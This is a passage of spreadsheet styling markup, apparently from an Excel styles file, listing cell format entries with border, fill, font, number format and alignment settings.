    <xf borderId="0" fillId="2" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="5" fillId="5" fontId="1" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="6" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="7" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="7" fillId="0" fontId="2" numFmtId="164" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="7" fillId="2" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="7" fillId="3" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="7" fillId="4" fontId="1" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="8" fillId="5" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="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readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="9" fillId="2" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="10" fillId="0" fontId="5" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="11" fillId="0" fontId="5" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="9" fillId="3" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="9" fillId="4" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="9" fillId="5" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="12" fillId="6" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="13" fillId="6" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="13" fillId="6" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="14" fillId="6" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="15" fillId="6" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="5" fillId="6" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="5" fillId="6" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="6" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="16" fillId="6" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="5" fillId="6" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="15" fillId="6" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="7" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="7" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="7" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="7" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="2" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="8" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="3" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="4" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="5" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="7" fillId="7" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="13" fillId="7" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="7" fontId="10" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="7" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="5" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="7" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="3" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="4" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="7" fontId="8" numFmtId="3" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="7" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="7" fontId="4" numFmtId="3" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="7" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="7" fontId="15" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="13" fillId="7" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="7" fontId="16" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="7" fontId="17" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="7" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="13" fillId="7" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="8" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="3" fontId="4" numFmtId="3" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="8" fontId="4" numFmtId="3" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="1" fillId="7" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="7" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="7" fontId="10" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="7" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="2" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="8" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="3" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="4" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="5" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="7" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="7" fontId="15" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="3" fillId="7" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="7" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="7" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="7" fontId="10" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="7" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="4" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="4" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="7" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="7" fontId="15" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="5" fillId="7" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="7" fontId="18" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="13" fillId="7" fontId="19" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="3" fontId="20" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="4" fontId="20" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="7" fontId="19" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="5" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="8" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="2" fontId="12"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2" fillId="7" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="17" fillId="0" fontId="21" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="14" fillId="0" fontId="5" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="13" fillId="0" fontId="5" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="17" fillId="0" fontId="22" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="6" fillId="0" fontId="5" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="7" fillId="0" fontId="5" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="8" fillId="0" fontId="5" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="1" fillId="8" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="8" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="3" fillId="8" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="1" fillId="9" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="9" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="3" fillId="9" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="1" fillId="8" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="2" fillId="0" fontId="5" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="3" fillId="0" fontId="5" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="6" fillId="10" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="7" fillId="10" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="10" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="6" fillId="11" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="7" fillId="11" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="11" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="1" fillId="11" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="23" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="24" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="24" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="1" fillId="12" fontId="24" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="7" fillId="12" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="16" fillId="6" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="5" fillId="6" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="12" fillId="6" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="24" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="13" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="13" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="13" fontId="4" numFmtId="49" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="13" fillId="13" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="1" fillId="13" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="2" fillId="13" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="2" fillId="13" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="2" fillId="13" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="3" fillId="13" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="24" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="25" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="25" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="26" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="26" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="2" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
